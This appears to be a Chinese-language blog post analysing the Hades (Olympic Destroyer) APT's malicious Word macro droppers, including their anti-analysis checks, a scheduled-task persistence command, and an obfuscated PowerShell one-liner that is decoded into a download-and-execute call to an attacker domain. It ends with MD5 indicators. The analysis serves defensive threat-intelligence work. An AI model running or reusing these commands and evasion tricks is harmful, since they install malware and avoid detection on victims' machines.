Hades Olympic Destroyer APT

checkpoint发布报告攻击奥运相关的APT组织–HADES的活动与特征。

攻击捕获

  1.    韩国2018年冬季奥运会的网络攻击。
  2. 发现横向移动功能的Wiper恶意软件
  3. 卡巴斯基能够确定这些攻击背后的初始攻击媒介:带有恶意文件的鱼叉式网络钓鱼电子邮件被用作渗透与奥运会相关的公司。
  4. 全球多个组织也成为目标,对韩国特别感兴趣。
  5. HADES多使用宏样本。

宏演变

检测工具:https://github.com/MalwareCantFly/Vba2Graph

感染流程

除了最近的droppers之外,上面的所有样本在执行的第一阶段都表现出类似的功能:

更多活动信息:https://securelist.com/olympic-destroyer-is-still-alive/86169/

新的样本变种

样本首先在2018-10-12从乌克兰上传到VT 它展示的编码和代码风格与之前的Hades系列样本使用的类似。然而,它引入了反分析和延迟执行等新功能,这些功能仅在过去的第二阶段有效负载中使用。

这些新功能被证明是有效的,因为流行的在线沙箱未能看到任何已启动的流程或网络活动。

样本分析

MD5:cd15a7c3cb1725dc9d21160c26ab9c2e

文件名:“ТЕХНИЧЕСКОЕ_ЗАДАНИЕ_НА_РАЗРАБОТКУ_МОБИЛЬНОГО_ПРИЛОЖЕНИЯ.doc”

创立日期:

2018-10-09 07:23:00

新的感染流程

我们将详细介绍此示例在以下每个执行步骤中引入的许多更改:

1. DOC诱饵

首先,向用户呈现空白页面。

激活后,宏会将白色文本更改为黑色,并显示内容。该文件的文本取自合法文件,可在线获取。

 

2. WMI – 分析

使用WMI,宏遍历正在运行的进程:

然后将返回的进程名称与流行的分析工具进行比较,宏还会验证至少有40个正在运行的进程。此进程计数对于通常运行少量进程的沙箱和分析环境非常有效。

分析工具清单:

HaCKER,MalzILlA,pRocExP,WiREShARK,HxD,PowERsheLl_iSE,idA,Olly,fiDDLEr,mALwAre,VmtoOLsd,SWingBoX,vboXTrAY,secunia,hijack,VmtoOlsd’,Vbox,vMWaRE,VXsTReaM,AUtOIt,vmToOls,TcpVIeW,WiREShARK,prOCEss expLorer, VIsuAl bASiC,fiDDLEr

归因注意

上述工具列表在旧版本的Powershell阶段进行了观察。

3.将HTA丢弃到磁盘

dropper将解码后的HTA文件写入“%APPDATA%\ WPFT532.hta”

4-5。预定任务

为HTA创建了计划任务,以便在早上执行。

schtasks / Create / F / SC DAILY / ST“10:20”/ TN“DriveCloudTaskCoreCheck”/ TR“mshta C:\\ Users \\ [user] \\ AppData \\ Roaming \\ WPFT532.hta

参数:

  • / F – 如果指定的任务已存在,则强制创建任务并禁止警告
  • / SC – 安排每日任务
  • / ST – 开始时间
  • / TN – 任务名称

6. HTA执行

HTA文件利用VBScript对下一级命令行进行解码,使用与宏级相同的技术和解码器。

7-9。Powershell下载并执行

HTA代码使用模糊的Powershell执行以下命令行。

c:\\WiNDOws\\sYsTEM32\\Cmd.eXE /c “Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,54, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 ,32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)^| . ( $pshOme[21]+$PSHoMe[30]+’x’) &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\\WiNDOws\\sYsTEM32\\Cmd.eXE /c %gNpq%”

Powershell反混淆阶段1:

(‘(N’+’ew-O’+’bject Net.W’+’ebclient)’+’.’+’downlo’+’adstring(Hl’+’jht’+’tp:’+’//findupda’+’te’+’ms.com/ch’+’e’+’ck/in’+’dexHlj)’+’4j’+’zIEX’).RepLaCe(([chAr]72+[chAr]108+[chAr]106),[StrIng][chAr]39).RepLaCe(([chAr]52+[chAr]106+[chAr]122),’|’)

Powershell反混淆阶段2:

(New-Object Net.Webclient).downloadstring('<http:// findupdatems> [。] com / check / index')| IEX

下载的字符串将作为要执行的附加Powershell进行评估。在分析时,我们无法下载第二阶段有效负载。

共同指标

Hades的doc文件和宏混淆器具有独特的特性,可用于将它们与其他dropper区分开来。这些特征存在于宏的新旧变体中。

元数据

虽然不是很有特色,但大多数滴管都包含三个文档作者名称之一:

Jamesjohn or AV.

虚拟代码

“如果”语句始终评估为“True”:

一个函数,其目的是返回0:

编码器功能

字符串和第二阶段代码显示在宏中编码:

要对字符串进行反混淆,使用解码功能(在我们的例子中为MSART8)。所有解码功能都是将每个编码字符的值减小一个常数值。即:如果我们的常数值为5,则每个编码字符的ASCII值将减少5。这个恒定值在不同的Hades样本之间变化。在其他情况下,在上述解码器之前,使用另一个解码器将十六进制字符串转换为文本,作为第一步:

 文件诱饵功能

大多数droppers使用2种方法,以便在用户启用宏后更改文档的外观:

使用以下循环删除文档诱饵图像封面:

通过将其颜色从白色更改为黑色来显示基础文本:

初始触发

对于初始触发,Hades 避免使用像AutoOpen这样的常见代码触发器,以避免模拟器进行静态检测/分析,而是使用鲜为人知的触发器与Word ActiveX对象结合使用。

有关此类触发器的更多信息可在此处找到。

一些触发器用于多个广告系列:

-MultiPage1_Layout – Frame1_Layout 
– SystemMonitor1_GotFocus 
– Image1_MouseMove 
– ImageCombo21_Change

网络基础设施说明

Hades的样本的一个常见做法是使用入侵获取的服务器作为第二阶段C2。尽管对Hades的基础设施知之甚少,但是一些联系他们的C2的dropper暴露了一些服务器错误。这些错误表明受感染的服务器仅充当代理,并且请求实际上被重定向到托管Empire后端的另一个服务器。

请求生成e160ca75a0e8c4bc9177f412b09e7a29(首次出现: 2018-06-05 )

请求由ac85b1fff1fe43ddad28bf1c4ce021c5生成(首次出现:2018-10-11

请求流程

这种“代理”功能以“Hop Listeners”的形式嵌入Empirehttps
//github.com/EmpireProject/Empire/blob/master/data/misc/hop.php

巧合的是,在hop.php的第25行有一个file_get_contents函数,就像我们在上面的错误消息中观察到的那样。

IOC–Droppers

e160ca75a0e8c4bc9177f412b09e7a29

7f327ae9b70d6a2bd48e20c897f7f726

e3487e2725f8c79d04ffda6de9612e25

ac85b1fff1fe43ddad28bf1c4ce021c5

cd15a7c3cb1725dc9d21160c26ab9c2e

发表评论

电子邮件地址不会被公开。 必填项已用*标注